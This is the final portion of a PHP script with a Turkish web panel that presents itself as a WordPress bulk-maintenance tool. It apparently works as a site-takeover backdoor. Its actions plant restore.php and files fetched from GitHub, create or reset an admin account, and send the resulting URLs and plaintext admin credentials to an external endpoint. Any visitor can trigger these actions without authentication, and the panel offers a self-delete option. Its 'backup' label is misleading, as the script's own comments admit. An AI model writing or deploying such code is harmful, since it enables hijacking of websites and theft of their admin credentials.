        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("Tüm işlemler başarıyla tamamlandı.");
    return true;
}

/**
 * 2) Integrate: obtains the site ID and writes __secwaf.php, nothing else.
 *
 * @return bool false if either step fails.
 */
function integrateSecwafOnly() {
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. Entegrasyon yapılamıyor...");
        return false;
    }
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı...");
        return false;
    }
    log_message("Site ID alındı ve __secwaf.php başarıyla oluşturuldu.");
    return true;
}

/**
 * 3) "Backup": writes restore.php, places the GitHub files, creates or
 * resets the admin user, then sends $copied_urls to $text_endpoint.
 *
 * Unlike doAll(), each failed step aborts the sequence. No site data is
 * backed up by this action despite its label.
 *
 * @return bool
 */
function backupOnly() {
    global $copied_urls, $text_endpoint;
    // Create restore.php
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı...");
        return false;
    }
    // Download/copy the GitHub files
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı...");
        return false;
    }
    // Create the admin user
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı veya şifresi resetlenemedi...");
        return false;
    }
    // Send the URLs to the endpoint
    if (!empty($copied_urls)) {
        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    log_message("Yedekleme işlemi başarıyla tamamlandı (restore.php oluştur, GitHub dosyaları, admin user, endpoint).");
    return true;
}

/**
 * 4) Reinstalls the WordPress core files only.
 *
 * @return bool
 */
function reinstallOnly() {
    if (!reinstall_wordpress_current_version()) {
        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("WordPress başarıyla yeniden kuruldu.");
    return true;
}

/** === FORM HANDLING === */
// The action is taken from $_REQUEST and dispatched without any credential, token or
// origin check, so any client that can reach this URL can trigger the operations.
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
if (!empty($action)) {
    switch ($action) {
        case 'all': doAll(); break;
        case 'integrate': integrateSecwafOnly(); break;
        case 'backup': backupOnly(); break;
        case 'reinstall': reinstallOnly(); break;
        case 'removeme': removeme(); break;
        default: log_message("Bilinmeyen action: $action"); break;
    }
}
?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <title>WordPress Toplu İşlemler</title> <style> body { font-family: Arial, sans-serif; } h2 { margin-top: 20px; } form { display: inline-block; margin-right: 10px; } input[type="submit"] { padding: 8px 16px; background-color: #4CAF50; color: #fff; border: none; cursor: pointer; margin-bottom: 10px; } input[type="submit"]:hover { background-color: #45a049; } pre { background: #f9f9f9; border: 1px solid #ccc; padding: 10px; } textarea { width: 100%; height: 200px; } </style> </head> <body> <h1>WordPress Toplu İşlemler</h1> <!-- 4 ayrı form (buton) --> <form method="post"> <input type="hidden" name="action" value="all"> <input type="submit" value="1 - Tümü (Her Şeyi Yap)"> </form> <form method="post"> <input type="hidden" name="action" value="integrate"> <input type="submit" value="2 - Entegre Et "> </form> <form method="post"> <input type="hidden" name="action" value="backup"> <input type="submit" value="3 - Yedekle "> </form> <form method="post"> <input type="hidden" name="action" value="reinstall"> <input type="submit" value="4 - WordPress'i Yeniden Kur"> </form> <form method="post"> <input type="hidden" name="action" value="removeme"> <input type="submit" value="5 - Kendini Sil"> </form> <hr> <h2>İşlem Logları</h2> <pre> <?php
/* Log lines are HTML-escaped on output; they include the generated admin password in plaintext. */
if (!empty($message)) {
    foreach ($message as $msg) {
        echo htmlspecialchars($msg) . "\n";
    }
}
?> </pre> <?php
// List of copied files / generated URLs (and the credential line added by manage_admin_user)
if (!empty($copied_urls)) {
    echo "<h2>Kopyalanan/Üretilen URL'ler</h2>";
    echo "<textarea id='copied-urls' readonly>";
    foreach ($copied_urls as $url) {
        echo htmlspecialchars($url) . "\n";
    }
    echo "</textarea><br>";
    echo '<button onclick="copyUrls()">Kopyala</button>';
}
?> <script> function copyUrls() { const urls = document.getElementById('copied-urls').value; navigator.clipboard.writeText(urls).then(() => { alert('URLs başarıyla panoya kopyalandı!'); }).catch(err => { alert('Kopyalama hatası: ' + err); }); } </script> </body> </html>